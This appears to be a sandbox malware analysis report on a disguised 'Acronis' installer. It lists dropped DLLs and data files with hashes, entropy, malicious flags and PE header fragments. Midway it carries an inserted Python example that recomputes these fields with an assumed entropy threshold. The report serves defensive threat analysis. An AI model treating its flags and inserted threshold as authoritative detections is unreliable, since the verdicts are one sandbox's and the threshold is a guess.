                                                                                                                                                                                                                                        SHA-512:9FBC870286643AFD636B37C3E4382F3DD2945E9C1D4F09EF7CDBA49B221D8F35D13C3228803469A7D929E81CF4751A78D934CA6A8A408A9A6B5A0D29E2A6CD99
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:module QtGraphicalEffects.private..plugin qtgraphicaleffectsprivate..classname QtGraphicalEffectsPlugin..FastGlow 1.0 FastGlow.qml..FastInnerShadow 1.0 FastInnerShadow.qml..FastMaskedBlur 1.0 FastMaskedBlur.qml..GaussianDirectionalBlur 1.0 GaussianDirectionalBlur.qml..GaussianGlow 1.0 GaussianGlow.qml..GaussianInnerShadow 1.0 GaussianInnerShadow.qml..GaussianMaskedBlur 1.0 GaussianMaskedBlur.qml..DropShadowBase 1.0 DropShadowBase.qml..

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):858512
Entropy (8bit):6.6801261433761185
Encrypted:false
SSDEEP:24576:oKI9x2m++aGCiJez1mfrq06cJKGv1DS7BQLG9Dp:U5BpCiy1mfu0RJKcDS7BQCl
MD5:44823FB067EFDD3DC2F023B313AB263C
SHA1:184ED6F663E2F4C67411BF2BF6DBC4BE3387005D
SHA-256:225D432437DDF86B0F0685C424268ED65BFCBE1907CF4F1D7B1AE6A6CB575D80
SHA-512:4A53156F203E8364D491A3B39E55EE41474473CB3C9CD9A14CDF9A357E8A9EB9DADC859C985CA40E07DC379B9BFDCDA4C94CCFF313DF63B20DE4CEF383E9C2F8
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):59280
Entropy (8bit):6.661684357969902
Encrypted:false
SSDEEP:768:EXDrY/MBgXY3MEYTn8V8GyMODlOcCUuPtxFDSpcfj07Lap4G0czcoYiYa2vC6AMB:k/Y1Y31YT8VmUXPzfj6/Grzco7VKxn
MD5:1F56DEE8B92CD70362E61A54175A4D5A
SHA1:0E4699EED2F03A7BCCC70199F532170C7F46BFBD
SHA-256:6B22D65A71AA2157AB6D6AC55DD1187C5F08C002CE0DDA55917A6E389222256B
SHA-512:65A1EFF33377B7B1D144835F441FDAE332FC36964B8FB6194EB2208A5BF0EFE4DA7EA14841049286137014333BFF760B8659B8BFBE063AD3D87B00182E7A7168
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1495
Entropy (8bit):4.948463579667309
Encrypted:false
SSDEEP:24:p9u9bxMSpcP61aeNetQRuzY78aDx82RvUGI7VjIYUoGgDCAQ:i9bKSp6FeNmQO7evUlvUngDa
MD5:090612B1C921F2D7094D80F6430733D5
SHA1:050025F1B573B53F30BD06AF0D30FA4ACDC66FA9
SHA-256:BDEB1DB80E2F10CD4D78F165A7348C3F1F7DAB8F263941081A1F8DE8A921751F
SHA-512:17F7641F266138519A63A4D6B493C72B5F39140CB2CFA73B07168F71C4D16BE8FD847C4BBDD045337B06741496D2C573F10CBF43B1D632491CBEA5EFC9946B29
Malicious:false
Preview:[XShortcuts]..File\Open=Ctrl+O..File\Exit=Alt+X..View\FullScreen=Ctrl+E..Strings\FollowIn\Hex=..Strings\Demangle=..Strings\Edit\String=..Signatures\Copy\Name=..Signatures\Copy\Signature=..Signatures\Copy\Address=..Signatures\Copy\Offset=..Signatures\FollowIn\Hex=..Hex\DataInspector=..Hex\DataConvertor=..Hex\Multisearch=..Hex\DumpToFile=Ctrl+D..Hex\GoTo\Offset=Ctrl+G..Hex\GoTo\Address=..Hex\GoTo\Selection\Start=..Hex\GoTo\Selection\End=..Hex\Signature=..Hex\Find\String=Ctrl+F..Hex\Find\Signature=..Hex\Find\Value=..Hex\Find\Next=F3..Hex\Select\All=Ctrl+A..Hex\Copy\Data=..Hex\Copy\Offset=..Hex\Copy\Address=..Hex\FollowIn\Disasm=..Hex\FollowIn\MemoryMap=..Hex\FollowIn\Hex=..Hex\Edit\Hex=..Hex\Edit\Remove=..Hex\Edit\Resize=..Hex\Strings=..Disasm\DumpToFile=Ctrl+D..Disasm\GoTo\Offset=..Disasm\GoTo\Address=Ctrl+G..Disasm\GoTo\EntryPoint=E..Disasm\GoTo\References=X..Disasm\Signature=Shift+G..Disasm\Hex\Signature=S..Disasm\Find\String=Ctrl+F..Disasm\Find\Signature=..Disasm\Find\Value=..Disasm\F

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):103312
Entropy (8bit):5.979453656708724
Encrypted:false
SSDEEP:3072:gT97/RgBXe/h21E4Vu/OQyHQZiKrnESg9RRL:gT9REUqxVu/faQgKHqX
MD5:C0BDC27A46B7E062AD6F63B8451AAE13
SHA1:ADBDE2D4F487D8792BA134EBDD2D0A0F6EDCE743
SHA-256:C24C0D1191A1538206A49563FC57922022ED99829B1EBDD7891A06E234AFF20F
SHA-512:294704A2728039B1BDB367502963F36D102D154FE965A3373BDCCBB8B015DD8CF9BA9C1C57FBEC6667330F41D7DFDE64F6D9D11CBC8E4E26E826FBAEAE7BC0F1
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):98224
Entropy (8bit):6.452201564717313
Encrypted:false
SSDEEP:1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:F34EB034AA4A9735218686590CBA2E8B
SHA1:2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):44008
Entropy (8bit):6.658320283903974
Encrypted:false
SSDEEP:768:qR2/DB8xoPdian7MGXWYMvtWsjv7XqWD8R0kD:qR29pVrXWBQ6ThwSkD
MD5:E62522E067AACF9E7A4FAF928BFC3965
SHA1:676105C373BF128A5B5700FF1F52486FD01E72B7
SHA-256:4C6BD47550FD0DEB7C29B95448CD35D40950CF12D3510E6C26C2E297574D1324
SHA-512:043F94AD6D2DF3751B2557A5E6F44613091950CCFC2065109ABD3C800C1EB95DACB262CE4DA9E95D8CEFD8161D06AE6009D192A0D702BE663F44E36DDB5223BE
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):58928
Entropy (8bit):6.210845696900253
Encrypted:false
SSDEEP:768:ZNVfaQtx0rrYIMhJygv8Vv8g+FB+iYB7E:nVCQt5Ibg47KB+tB7E
MD5:9BB14D1464473D1F56AE1D24D6392E92
SHA1:8B7AB1FB92B09D4AFC6F9D42E4D8AD5D1C8D0FD7
SHA-256:BDDAB562C19FA28B2EF824ED6E18FF7D692B2196BC34FAE7895D9FAF51926C1A
SHA-512:90029EBF849B2DA771DC7DCCBA392CD66E71CF77376F6279DD0864EFEBFC535E882CC63F0BC8EFE3B067AB3C6639BC70365915BBD8EA18EEB68BB22F866AC66D
Malicious:true

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):131920
Entropy (8bit):6.0574531251583865
Encrypted:false
SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
MD5:F57FB935A9A76E151229F547C2204BBA
SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                                                                                                                                                                        SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                                                                                                                                                                        SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27536
                                                                                                                                                                                                                                        Entropy (8bit):6.7311768831441015
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:wmsg2cM28YFcc9qltpD5+b0pHyYiYa2vCQcAMxkE7:wR7YFJqpIbSHy7Ve6xv
                                                                                                                                                                                                                                        MD5:9BE19993A9A1EC0FAFD72C974F75CA8F
                                                                                                                                                                                                                                        SHA1:0CADF3357CFEBBB10997C8B113A9D7A4E82FECE8
                                                                                                                                                                                                                                        SHA-256:A7037919282076F0DB53627154BCE3F5E787EA16C760FECCA00A5B0614F16121
                                                                                                                                                                                                                                        SHA-512:587B3D31CFF0E7D282136574A9EE5AC687DBEA3997455BC449AF4A24DD7C73EB82813BE3CCF4E6B2BC41360E03F79383972D182DFCF64E783440F622DF01A274
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%.v.D.%.D.%.D.%R..%.D.%...%.D.%..'%.D.%..&%.D.%...%.D.%:..%.D.%.D.%.D.%:.&%.D.%:..%.D.%...%.D.%:..%.D.%Rich.D.%........PE..L.....*f...........!..... ...".......%.......0...........................................@..........................7..y...,8.......p..P............B...).......... 1..8............................3..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........P.......6..............@....qtmetad.....`.......8..............@..P.rsrc...P....p.......:..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49268
                                                                                                                                                                                                                                        Entropy (8bit):7.996032002835928
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:DMM7WgDAShQzXj+0dgGTI0A9XsiTN1WMZR7/PeP8nzo3oCsCe2eZJtbiGx3i:DrPDAfbp5xqXsKXPmx3oCMfbiGxS
                                                                                                                                                                                                                                        MD5:8FD58F1FD430FCA2CD8F3CB6B5597892
                                                                                                                                                                                                                                        SHA1:DE00E7313D13EB684F87CF72687D665869E0446A
                                                                                                                                                                                                                                        SHA-256:0310A91F85E03C06D209BAC2BEA6911EBF26AF56BE1C715ABE76CFE597F0F697
                                                                                                                                                                                                                                        SHA-512:38B9F3DB432445517B882101DE804D660291F1649995AB5D3F7BF828E3200B79399CBA16A76FDC663B5F7F8CCD8D6C0D19D071847181CDF61A32706D2D9230E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............T...3.2.T...3.2kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T.."..f.....'......b~....9..a...-.s..T..eL{2.T...3.2m.....Od..8.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o....Q..5.....4h. .`.'....pl....R.....$.o...H..........b..y<...:(..K........S.nr.JW..'.Y%.......O.K.n.B...J..-L.q..L......dZ.O..\.7b....2.6.d.Y...\..0......T.U..[.B.}.&#x.g..d.8..k.>.Gs!/&K!3..f...^...}.....i.Dr..Vy..0..StH.5..{......}.......^...."89..k...F.Y$......9L.LFU.t.....V........Jsz
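The dropped-file entries above report an 8-bit entropy value, an Encrypted flag derived from it (7.996 is flagged true, 6.6 and 6.0 are not), and a File Type string decoded from the PE header. The following is an added example, not code from the Joe Sandbox report, that recomputes those fields from raw bytes so an analyst can reproduce them on a local copy of a dropped file. The entropy cut-off of 7.9 is an assumption chosen to match the values on this page, not Joe Sandbox's actual threshold, and the sample PE header is constructed inline for illustration.

```python
"""Recompute Joe Sandbox style per-file fields (entropy, Encrypted, File Type, hashes).
Added example; threshold and the header-only sample PE are assumptions."""
import hashlib
import math
import struct
from collections import Counter

# Assumed cut-off: the report flags 7.996 as Encrypted:true and 6.62 as false.
ENTROPY_ENCRYPTED_THRESHOLD = 7.9

IMAGE_FILE_DLL = 0x2000          # COFF Characteristics bit for a DLL
MAGICS = {0x10B: "PE32", 0x20B: "PE32+"}
MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64"}
SUBSYSTEMS = {2: "GUI", 3: "console"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, in the range 0.0 .. 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes) -> bool:
    """Packed, compressed or encrypted payloads sit close to 8 bits per byte."""
    return shannon_entropy(data) >= ENTROPY_ENCRYPTED_THRESHOLD


def pe_file_type(data: bytes) -> str:
    """Return a File Type label in the report's style, or 'data' if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "data"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    coff_off = e_lfanew + 4            # COFF header follows the "PE\0\0" signature
    opt_off = coff_off + 20            # optional header follows the 20-byte COFF header
    # Subsystem lives at optional-header offset 68 for both PE32 and PE32+.
    if opt_off + 70 > len(data) or data[e_lfanew:coff_off] != b"PE\0\0":
        return "data"
    machine, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, coff_off)
    (magic,) = struct.unpack_from("<H", data, opt_off)
    (subsystem,) = struct.unpack_from("<H", data, opt_off + 68)
    fmt, arch = MAGICS.get(magic), MACHINES.get(machine)
    if fmt is None or arch is None:
        return "data"
    parts = [fmt, "executable"]
    if characteristics & IMAGE_FILE_DLL:
        parts.append("(DLL)")
    parts.append("(%s)" % SUBSYSTEMS.get(subsystem, "subsystem %d" % subsystem))
    parts.append(arch + ",")
    parts.append("for MS Windows")
    return " ".join(parts)


def describe(data: bytes) -> dict:
    """Dictionary keyed like the report's dropped-file fields (upper-case hex hashes)."""
    return {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy(data),
        "Encrypted": looks_encrypted(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def build_minimal_pe(pe32plus: bool, dll: bool, console: bool) -> bytes:
    """Constructed sample: a header-only PE buffer, just enough for pe_file_type()."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    machine = 0x8664 if pe32plus else 0x14C
    characteristics = 0x0002 | (IMAGE_FILE_DLL if dll else 0)   # 0x0002 = EXECUTABLE_IMAGE
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, 3 if console else 2)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for sample in (build_minimal_pe(True, True, True), build_minimal_pe(False, False, False),
                   bytes(range(256)) * 4):
        for key, value in describe(sample).items():
            print("%s:%s" % (key, value))
        print()
```

To run it against a real dropped file, read it with `open(path, "rb").read()` and pass the bytes to `describe()`; the MD5/SHA values then match the report's lines directly, while the entropy and Encrypted values let you check whether a payload the sandbox did not unpack is worth a second look.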
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5676923
                                                                                                                                                                                                                                        Entropy (8bit):6.275861681921798
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:bvHzDf6dXE4A8rChULBDqifkxGVZVB2nz:rnmBDN4z
                                                                                                                                                                                                                                        MD5:2BFAE5A9C25EB28D8C281E420F8DC220
                                                                                                                                                                                                                                        SHA1:1824797CD8BC62628818066DB7E075616CCF2D33
                                                                                                                                                                                                                                        SHA-256:C5249A0DD9846F2AC173C6AAEE47DDD022DD498AF59AB53FD275FDA1966A16CB
                                                                                                                                                                                                                                        SHA-512:DA1FF02AA4AE9A090FE10730AB52693592B4830B169DB2ACF99EF0412EE4FCBC1A1E0E1A5B5E511E0A7470905058C67011A0B5F1CC7E69D043B4790273447AF9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:X!q...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X!q.....................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):943784
                                                                                                                                                                                                                                        Entropy (8bit):6.621472142472864
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                                                                                                        MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                                        SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                                                                                                        SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                                                                                                        SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):943784
                                                                                                                                                                                                                                        Entropy (8bit):6.621472142472864
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                                                                                                        MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                                        SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                                                                                                        SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                                                                                                        SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5676923
                                                                                                                                                                                                                                        Entropy (8bit):6.275861681921798
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:bvHzDf6dXE4A8rChULBDqifkxGVZVB2nz:rnmBDN4z
                                                                                                                                                                                                                                        MD5:2BFAE5A9C25EB28D8C281E420F8DC220
                                                                                                                                                                                                                                        SHA1:1824797CD8BC62628818066DB7E075616CCF2D33
                                                                                                                                                                                                                                        SHA-256:C5249A0DD9846F2AC173C6AAEE47DDD022DD498AF59AB53FD275FDA1966A16CB
                                                                                                                                                                                                                                        SHA-512:DA1FF02AA4AE9A090FE10730AB52693592B4830B169DB2ACF99EF0412EE4FCBC1A1E0E1A5B5E511E0A7470905058C67011A0B5F1CC7E69D043B4790273447AF9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:X!q...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X!q.....................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49268
                                                                                                                                                                                                                                        Entropy (8bit):7.996032002835928
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:DMM7WgDAShQzXj+0dgGTI0A9XsiTN1WMZR7/PeP8nzo3oCsCe2eZJtbiGx3i:DrPDAfbp5xqXsKXPmx3oCMfbiGxS
                                                                                                                                                                                                                                        MD5:8FD58F1FD430FCA2CD8F3CB6B5597892
                                                                                                                                                                                                                                        SHA1:DE00E7313D13EB684F87CF72687D665869E0446A
                                                                                                                                                                                                                                        SHA-256:0310A91F85E03C06D209BAC2BEA6911EBF26AF56BE1C715ABE76CFE597F0F697
                                                                                                                                                                                                                                        SHA-512:38B9F3DB432445517B882101DE804D660291F1649995AB5D3F7BF828E3200B79399CBA16A76FDC663B5F7F8CCD8D6C0D19D071847181CDF61A32706D2D9230E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....D....9..u2.+..^..R.a@.].F.e..EQi.,.......m..%......w4#.....f...\..z..})..4.m....vs.....f..b..O.?.I8..o...K.,.qn...D..............T...3.2.T...3.2kC.R......%x....}...q..U-...(....%....V..?p.h`...55.SZ_S.^q..x.....k>r0...O...9xe7y>.v.T...Ip... .o*z.`7G......i...{Z/....Nk...m.N......c)Y.`.37...i=..T.."..f.....'......b~....9..a...-.s..T..eL{2.T...3.2m.....Od..8.5...x...(nU.j....06.f".].X.:..)...=.H.}.......$......G.............#=._.z.8..7.O..g}.a.Df!..v-."Yj...=c.#..t.E....*Yt].5M".....z.8.\y..}=.~./.P....3.?A\U.......?..Cp.~....E.K...9....(...0.=}.{.t4+.o....Q..5.....4h. .`.'....pl....R.....$.o...H..........b..y<...:(..K........S.nr.JW..'.Y%.......O.K.n.B...J..-L.q..L......dZ.O..\.7b....2.6.d.Y...\..0......T.U..[.B.}.&#x.g..d.8..k.>.Gs!/&K!3..f...^...}.....i.Dr..Vy..0..StH.5..{......}.......^...."89..k...F.Y$......9L.LFU.t.....V........Jsz
                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):0.38870031100602437
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.72%
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.68%
                                                                                                                                                                                                                                        • Windows ActiveX control (116523/4) 0.58%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                        File name:acronis recovery expert deluxe 1.0.0.132.rarl.exe
                                                                                                                                                                                                                                        File size:829'879'991 bytes
                                                                                                                                                                                                                                        MD5:2c83fb776a9e238d88e32393f17ae06a
                                                                                                                                                                                                                                        SHA1:d74323c285d31ecd483e25c86e21222ca38ab227
                                                                                                                                                                                                                                        SHA256:cb9670d377d8e1d3c11c63dc0e87f02339723ab2d88d10425a905437f6edb5a3
                                                                                                                                                                                                                                        SHA512:fa647e65a6ad168fb580e95afb4f55ff343c87b28e60f7989ab074cc1baa798773810eed13a1bec93a4bb886d891c30518c1a2d5fd1b00df4ed0a79712cc91d3
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        TLSH:
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...f...B...8.....
                                                                                                                                                                                                                                        Icon Hash:7efe9a0bc7e76733
                                                                                                                                                                                                                                        Entrypoint:0x4038af
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                        Signature Valid:
                                                                                                                                                                                                                                        Signature Issuer:
                                                                                                                                                                                                                                        Signature Validation Error:
                                                                                                                                                                                                                                        Error Number:
                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                            Version:
                                                                                                                                                                                                                                            Thumbprint MD5:
                                                                                                                                                                                                                                            Thumbprint SHA-1:
                                                                                                                                                                                                                                            Thumbprint SHA-256:
                                                                                                                                                                                                                                            Serial:
Entrypoint Instructions (disassembly starting at 0x4038af in .text):
                                                                                                                                                                                                                                            sub esp, 000002D4h
                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                            push esi
